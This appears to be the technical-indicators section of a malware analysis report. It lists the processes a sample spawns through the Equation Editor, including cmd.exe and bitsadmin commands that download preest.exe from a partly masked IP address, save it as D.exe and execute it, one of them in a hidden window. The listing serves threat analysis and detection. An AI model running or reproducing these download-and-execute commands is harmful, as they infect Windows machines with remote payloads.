Technical Information
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer vd /priority foreground http://18#.##7.83.56:4560/preest.exe %USERPROFILE%\D.exe && start %USERPROFILE%\D.exe
- '18#.#27.83.56':4560
- '%WINDIR%\syswow64\cmd.exe' /c bitsadmin /transfer vd /priority foreground http://18#.##7.83.56:4560/preest.exe %USERPROFILE%\D.exe && start %USERPROFILE%\D.exe' (with hidden window)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding
- '%WINDIR%\syswow64\bitsadmin.exe' /transfer vd /priority foreground http://18#.##7.83.56:4560/preest.exe %HOMEPATH%\D.exe